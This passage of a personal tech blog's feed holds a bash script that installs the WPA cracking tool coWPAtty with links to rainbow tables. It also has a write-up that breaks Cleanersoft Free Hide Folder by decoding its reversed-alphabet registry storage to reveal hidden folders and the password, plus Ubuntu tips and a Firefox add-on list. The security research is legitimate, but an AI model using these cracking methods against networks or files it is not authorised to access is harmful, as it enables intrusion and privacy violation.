style="font-weight: bold;"&gt;echo "\e[1;34mMD5 SHOULD BE b90fd36ad987c99e7cc1d2a05a565cbd\e[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo -e "\n \e[1;34m[*] Extracting cowpatty-4.6.tgz\e[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;tar -xvf cowpatty-4.6.tgz &amp;gt; /dev/null&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;cd cowpatty-4.6 &amp;gt; /dev/null&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo -e "\n \e[1;34m[*] Downloading Cowpatty Patch\e[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;wget http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo -e "\n \e[1;34m[*] Patching Cowpatty code"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;patch &amp;lt; cowpatty-4.6-fixup16.patch&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo -e "\n \e[1;34m[*] Compiling Cowpatty\e[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;make&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo -e "\n \e[1;34m[*] Installing cowpatty to system\e[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;sudo make install&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo -e "\n \e[1;34m[*] Removing Cowpatty Directory\e[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;cd .. &amp;gt; /dev/null&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;rm -r -f cowpatty-4.6 &amp;gt; /dev/null&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo -e "\n \e[1;34m[*] Removing cowpatty-4.6.tgz\e[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;rm cowpatty-4.6.tgz &amp;gt; /dev/null&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo -e "\n \e[1;34m[*] testing to see if cowpatty works\e[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;cowpatty&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo -e "\n \e[1;34m[*] Done!\e[0m"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;Links:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz"&gt;http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz&lt;/a&gt;&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;- Get coWPAtty here&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://proton.cygnusx-1.org/%7Eedgan/cowpatty/cowpatty-4.6-fixup16.patch"&gt;http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch&lt;/a&gt; - Patch to fix several issues with cowpatty&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://www.renderlab.net/projects/WPA-tables/"&gt;http://www.renderlab.net/projects/WPA-tables/&lt;/a&gt; - A place to get 33GB of Rainbow tables for free download.&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/jwright@hasborg.com&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-6055952792801595627?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/6055952792801595627'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/6055952792801595627'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2011/06/patch-compile-and-installing-cowpatty.html' title='Patch, Compile, and Installing coWPAtty 4.6 on Ubuntu'/><author><name>The Unl33t</name><uri>http://www.blogger.com/profile/17211285403285610915</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_mJgRowKkfO8/Sx1rna_mfxI/AAAAAAAAADM/xeeVOgHj1PE/S220/myself.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-3019165435451904187</id><published>2011-03-16T22:54:00.003-04:00</published><updated>2011-03-16T23:04:22.310-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='computers'/><category scheme='http://www.blogger.com/atom/ns#' term='Fix'/><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><category scheme='http://www.blogger.com/atom/ns#' term='JRE'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips and Tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Sun'/><category scheme='http://www.blogger.com/atom/ns#' term='Troubleshooting'/><category scheme='http://www.blogger.com/atom/ns#' term='FireFox'/><category scheme='http://www.blogger.com/atom/ns#' term='OpenJDK'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning Commandline'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>How to make ubuntu 10.10 use Sun Java instead of OpenJDK</title><content type='html'>I had an issue where the default OpenJDK that comes with ubuntu 10.10 was not letting me run an applet I needed. Here is how in 6 commands you can switch from openJDK to Sun Java&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new; color: rgb(102, 102, 102); font-weight: bold;"&gt;sudo apt-get purge openjdk-6-jre openjdk-6-jre-headless&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new; color: rgb(102, 102, 102); font-weight: bold;"&gt;sudo add-apt-repository deb http archive.canonical.com/ maverick partner&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new; color: rgb(102, 102, 102); font-weight: bold;"&gt;sudo apt-get update&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new; color: rgb(102, 102, 102); font-weight: bold;"&gt;sudo apt-get install sun-java6-jre sun-java6-plugin&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new; color: rgb(102, 102, 102); font-weight: bold;"&gt;sudo apt-get install sun-java6-fonts&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new; color: rgb(102, 102, 102); font-weight: bold;"&gt;sudo update-java-alternatives --set java-6-sun&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Line 1  : Removes OpenJDK from your machine&lt;br /&gt;Line 2-3: Allows you to use the partner repository which has the sun packages and updates apt&lt;br /&gt;Line 4-5: Installs the needed files needed for the Sun JRE to run&lt;br /&gt;Line 6  : Tells your system to only use the sun java binaries.&lt;br /&gt;&lt;br /&gt;Hope this helps&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-3019165435451904187?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/3019165435451904187'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/3019165435451904187'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2011/03/how-to-make-ubuntu-1010-use-sun-java.html' title='How to make ubuntu 10.10 use Sun Java instead of OpenJDK'/><author><name>The Unl33t</name><uri>http://www.blogger.com/profile/17211285403285610915</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_mJgRowKkfO8/Sx1rna_mfxI/AAAAAAAAADM/xeeVOgHj1PE/S220/myself.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-91477969105907665</id><published>2011-02-08T07:08:00.004-05:00</published><updated>2011-02-08T07:13:11.648-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='one-liner'/><category scheme='http://www.blogger.com/atom/ns#' term='computers'/><category scheme='http://www.blogger.com/atom/ns#' term='Fix'/><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips and Tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>How To Move the Buttons on Ubuntu 10.04 from the Left to the Right with one command</title><content type='html'>So, Ubuntu decided to hop on the Apple bandwagon and move the buttons at the top of the window for close, minimize, maximize to the left. This annoyed me to no ends. So after some searching I found this simple one liner!&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;gconftool-2 --set /apps/metacity/general/button_layout --type string menu:minimize,maximize,close&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;(Shoutouts to &lt;a href="http://www.junauza.com/2010/05/move-ubuntu-1004-window-buttons-from.html"&gt;http://www.junauza.com/2010/05/move-ubuntu-1004-window-buttons-from.html&lt;/a&gt; for finding this)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-91477969105907665?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/91477969105907665'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/91477969105907665'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2011/02/how-to-move-buttons-on-ubuntu-1004-from.html' title='How To Move the Buttons on Ubuntu 10.04 from the Left to the Right with one command'/><author><name>The Unl33t</name><uri>http://www.blogger.com/profile/17211285403285610915</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_mJgRowKkfO8/Sx1rna_mfxI/AAAAAAAAADM/xeeVOgHj1PE/S220/myself.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-3631470434817906672</id><published>2010-10-04T19:10:00.010-04:00</published><updated>2011-03-16T23:27:47.097-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='computers'/><category scheme='http://www.blogger.com/atom/ns#' term='fhide'/><category scheme='http://www.blogger.com/atom/ns#' term='fhide.exe'/><category scheme='http://www.blogger.com/atom/ns#' term='Breaking'/><category scheme='http://www.blogger.com/atom/ns#' term='IT'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><category scheme='http://www.blogger.com/atom/ns#' term='stegano'/><category scheme='http://www.blogger.com/atom/ns#' term='reveal'/><category scheme='http://www.blogger.com/atom/ns#' term='forensics'/><category scheme='http://www.blogger.com/atom/ns#' term='cryptography'/><category scheme='http://www.blogger.com/atom/ns#' term='Free Hide Folder'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips and Tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='encryption'/><category scheme='http://www.blogger.com/atom/ns#' term='Password Recovery'/><category scheme='http://www.blogger.com/atom/ns#' term='cleanersoft'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Cracking Cleanersoft Free Hide Folder Security</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Introduction&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;Cleanersoft Free Hide Folder is a "security" tool used to hide your folders. The program uses a simple interface that is protected by a password that lets you hides and unhides selected folders. Our target objectives here will be to find where it is hiding the information about what folders are hidden and recover the password.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Finding where the folder information is stored&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;   Well, We will use the easiest approach, see what files and registry keys the program (fhide.exe) writes to using Process Monitor while hiding a folder (in this case C:\test). This should show us where it is writing to and it seems this approach worked out well.&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;a href="http://1.bp.blogspot.com/_mJgRowKkfO8/TKplDExgpFI/AAAAAAAAAFI/qq6zKZu07kw/s1600/FHF-ProcMon.png"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 400px; height: 188px;" src="http://1.bp.blogspot.com/_mJgRowKkfO8/TKplDExgpFI/AAAAAAAAAFI/qq6zKZu07kw/s400/FHF-ProcMon.png" alt="" id="BLOGGER_PHOTO_ID_5524338996418749522" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Well, What have we here. We see a file operation on my C:\test folder, it renamed the folder "CHKDSK.100ÿÿ" and that is followed by a registry key creation at "HKCU\Software\Microsoft\Windows\CurrentVersion\Namespace\getPrefix0".&lt;br /&gt;&lt;br /&gt;First let's confirm the folder was renamed. since it is hidden I will run the command line command "&lt;span style="font-weight: bold;"&gt;DIR /A:SH CHKDSK.*&lt;/span&gt;" (the /A:SH will show hidden and system files and folders). Wow... It's right there, great hiding trick.... is it accessible? Run a "&lt;span style="font-weight: bold;"&gt;cd CHKDSK.100ÿÿ&lt;/span&gt;". Looks like we can.&lt;br /&gt;&lt;br /&gt;Okay, Let's see whats hidden here with a "&lt;span style="font-weight: bold;"&gt;Dir&lt;/span&gt;" command and we see &lt;span style="font-style: italic;"&gt;private.txt&lt;/span&gt;. Okay, well it should be encrypted right? guess again... "&lt;span style="font-weight: bold;"&gt;Type private.txt&lt;/span&gt;".&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_mJgRowKkfO8/TKpqO9iIkyI/AAAAAAAAAFQ/gxzrkQr_YJQ/s1600/FHF-commandline.png"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 400px; height: 206px;" src="http://4.bp.blogspot.com/_mJgRowKkfO8/TKpqO9iIkyI/AAAAAAAAAFQ/gxzrkQr_YJQ/s400/FHF-commandline.png" alt="" id="BLOGGER_PHOTO_ID_5524344698191778594" border="0" /&gt;&lt;/a&gt;   Well We are off a bad start for security. But how do we know where these are hidden if we didn't hide them? How can we find them? Well lets check out that registry key. Okay. Let's take a look at the keys here.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;getPrefix0 = E&lt;/li&gt;&lt;li&gt;Declaration0 = X:*XSPWHP.377ÿÿ&lt;/li&gt;&lt;li&gt;Javax0 = X:*gvhg&lt;/li&gt;&lt;/ul&gt;   Hmmm.... Declaration0 and Javax0 both start with X:*, interesting. well. Lets make another hidden folder called &lt;span style="font-weight: bold;"&gt;C:\test123&lt;/span&gt; which becomes &lt;span style="font-weight: bold;"&gt;CHKDSK.101ÿÿ&lt;/span&gt;. Well, now we have 3 new keys. they are the same names as above but instead we have a one at the end instead of zero.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;getPrefix1 = E&lt;/li&gt;&lt;li&gt;Declaration1 = X:*XSPWHP.373ÿÿ&lt;/li&gt;&lt;li&gt;Javax1 = X:*gvhg321&lt;/li&gt;&lt;/ul&gt;   Okay, Starting to see a pattern. It looks like Declaration is for the new hidden file name. Javax is for what it's unhidden name. getPrefix stayed the same. It appears to be a simple substitution cipher. The easy way to figure it out? Well, Let make a folder called C:\abcdefghijklmnopqrstuvwxyz1234567890 and put it side by side with encrypted value and we have a key chart ;-).&lt;br /&gt;&lt;ul&gt;&lt;li&gt;C:\abcdefghijklmnopqrstuvwxyz1234567890&lt;/li&gt;&lt;li&gt;X:*zyxwvutsrqponmlkjihgfedcba3215894067&lt;/li&gt;&lt;/ul&gt;   Looks like the alphabet is just backwards. "/" becomes "*". The only thing different is the numbers but not that big of a deal, since we now see the key above anyways. So now we can decrypt the Declaration and Javax keys. they point to the folders, both hidden and unhidden names, just as we thought.&lt;br /&gt;&lt;br /&gt;The last is the getPrefix key. I had one folder unhidden when I was working and the key value changed to "W". So it seems that "E" means it is hidden, "W" means not hidden. So I'd Say we have this down now.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Finding The Password&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Last thing to attack is the password for the program (in this case it is "Password"). Let's check more into the registry. There is one more key here:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;BAR - Kzhhdliw&lt;/li&gt;&lt;/ul&gt;   Surprise. my password and this key are both the same length. the 3rd and 4th characters repeat. Let's just try to decrypt it with our key chart above and... yep, that's our password... So with this information I was able to code a little tool that can exploit this to prove concept for academic reasons (And to only be used for that). I call the tool "Free Unhide Folder" (original huh?).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Resources&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;CleanerSoft Free Hide Folder: &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.cleanersoft.com/hidefolder/free_hide_folder.htm"&gt;http://www.cleanersoft.com/hidefolder/free_hide_folder.htm&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;Substitution cipher:&lt;br /&gt;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Substitution_cipher"&gt;http://en.wikipedia.org/wiki/Substitution_cipher&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;Substitution cipher solver: &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.purplehell.com/riddletools/applets/cryptogram.htm"&gt;http://www.purplehell.com/riddletools/applets/cryptogram.htm&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;Free Unhide Folder (Source[vb.net 2008] and Binary): &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://packetstormsecurity.org/1010-exploits/FreeUnHideFolder.zip"&gt;http://packetstormsecurity.org/1010-exploits/FreeUnHideFolder.zip&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-3631470434817906672?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/3631470434817906672'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/3631470434817906672'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2010/10/cracking-cleanersoft-free-hide-folder.html' title='Cracking Cleanersoft Free Hide Folder Security'/><author><name>The Unl33t</name><uri>http://www.blogger.com/profile/17211285403285610915</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_mJgRowKkfO8/Sx1rna_mfxI/AAAAAAAAADM/xeeVOgHj1PE/S220/myself.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_mJgRowKkfO8/TKplDExgpFI/AAAAAAAAAFI/qq6zKZu07kw/s72-c/FHF-ProcMon.png' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-2659426731401809195</id><published>2010-06-07T22:43:00.011-04:00</published><updated>2011-02-08T22:54:31.454-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Advance Dork'/><category scheme='http://www.blogger.com/atom/ns#' term='computers'/><category scheme='http://www.blogger.com/atom/ns#' term='ShowIP'/><category scheme='http://www.blogger.com/atom/ns#' term='IT'/><category scheme='http://www.blogger.com/atom/ns#' term='leetkey'/><category scheme='http://www.blogger.com/atom/ns#' term='Firecookie'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='No Script'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips and Tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='encryption'/><category scheme='http://www.blogger.com/atom/ns#' term='Fireshot'/><category scheme='http://www.blogger.com/atom/ns#' term='XSS protection'/><category scheme='http://www.blogger.com/atom/ns#' term='FireFox'/><category scheme='http://www.blogger.com/atom/ns#' term='Firebug'/><category scheme='http://www.blogger.com/atom/ns#' term='Noscript'/><title type='text'>8 Firefox Add-ons to help manage the web</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/1865/"&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Adblock Plus&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://addons.mozilla.org/img/uploads/previews/thumbs/13/13530.png?modified=1177025970"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 150px;" src="https://addons.mozilla.org/img/uploads/previews/thumbs/13/13530.png?modified=1177025970" alt="" border="0" /&gt;&lt;/a&gt;   This one is a must! block annoying ads, avoid tracking cookies, and save your self some bandwidth (helps speed things up for everyone by not downloading ad images). This ad blocker also uses an anti-virus like subscription list which updates to avoid new ad servers all together. if it fails to block an ad. you can block it yourself; By frame, single image, or even the server (and supports wildcards like *).&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/722/"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;NoScript&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://addons.mozilla.org/img/uploads/previews/full/0/820.png?modified=0"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 150px; height: 150px;" src="https://addons.mozilla.org/img/uploads/previews/full/0/820.png?modified=0" alt="" border="0" /&gt;&lt;/a&gt;   Noscript Allows you to disable javascript and select which sites can run javascript on your browser. This help protect against IFRAMES and other XSS attacks..&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/770/"&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;leetkey&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_mJgRowKkfO8/TA27UyXfyzI/AAAAAAAAAE4/EgeI14drVjo/s1600/leetkey.bmp"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 229px;" src="http://2.bp.blogspot.com/_mJgRowKkfO8/TA27UyXfyzI/AAAAAAAAAE4/EgeI14drVjo/s400/leetkey.bmp" alt="" id="BLOGGER_PHOTO_ID_5480242287371864882" border="0" /&gt;&lt;/a&gt;   Leetkey allows you to convert strings to other encoding and vice versa. binary, Hex, Base64, l33t, Rot13, Reverse, and even morse code. It also has a encryption module on it to encrypt and decrypt strings. Below are a few examples of these things encoded with leetkey.&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Normal String: This is a test string&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Reverse String: gnirts tset a si sihT&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;leet: 7h15 15 4 7357 57r1n6&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Binary: 01010100 01101000 01101001 01110011 00100000 01101001 01110011 00100000 01100001 00100000 01110100 01100101 01110011 01110100 00100000 01110011 01110100 01110010 01101001 01101110 01100111&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Hex: 54 68 69 73 20 69 73 20 61 20 74 65 73 74 20 73 74 72 69 6e 67&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Rot13: Guvf vf n grfg fgevat&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;URL Encoding: This+is+a+test+string&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Morse Code: - .... .. ...   .. ...   .-   - . ... -   ... - .-. .. -. --.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;DES encrypted with password test: olZule+WVI7q4HtjQ90td/TiLFgBALW0GJmr0oMB958=&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/590/"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;ShowIP&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://addons.mozilla.org/img/uploads/previews/thumbs/1/1183.png?modified=0"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 150px;" src="https://addons.mozilla.org/img/uploads/previews/thumbs/1/1183.png?modified=0" alt="" border="0" /&gt;&lt;/a&gt;      This shows you the IP address of server you are connected to in your status bar and always you to run whois, netcraft, Whoishostingthis.com, and ip2country. Good for security. If your at a wifi Hotspot and it shows your web-mail log-in page IP address is in the same LAN subnet, you are probably the victim of DNS Poisoning or a man-in-the-middle attack my friend. It might be worth your time to investigate the IP or move to a less hostile network.&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center; font-weight: bold;"&gt;&lt;span style="font-size:130%;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/5648/"&gt;Fireshot&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://addons.mozilla.org/img/uploads/previews/full/25/25489.png?modified=1220429515"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 700px; height: 482px;" src="https://addons.mozilla.org/img/uploads/previews/full/25/25489.png?modified=1220429515" alt="" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: normal;"&gt;      This tool allows you to capture an entire web page from the browser top to bottom or just a section or what is visible or the entire window and has a built in editor for cropping.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/1843/"&gt;FireBug&lt;/a&gt; and &lt;a href="https://addons.mozilla.org/en-US/firefox/addon/6683/"&gt;Firecookie&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://addons.mozilla.org/img/uploads/previews/thumbs/9/9486.png?modified=0"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 150px;" src="https://addons.mozilla.org/img/uploads/previews/thumbs/9/9486.png?modified=0" alt="" border="0" /&gt;&lt;/a&gt;   These two work together. Firebug can help you, in real time, debug a web page, highlights the code section on the page. also allows you to edit the code and then update it in real time (great for modifying web forms ;-] ). Firecookie allows you to look at your site cookie in real-time and edit and delete values in real time. All this is nicely done at the bottom of the browser! A MUST FOR WEB DEVELOPERS AND HACKERS ALIKE!&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div 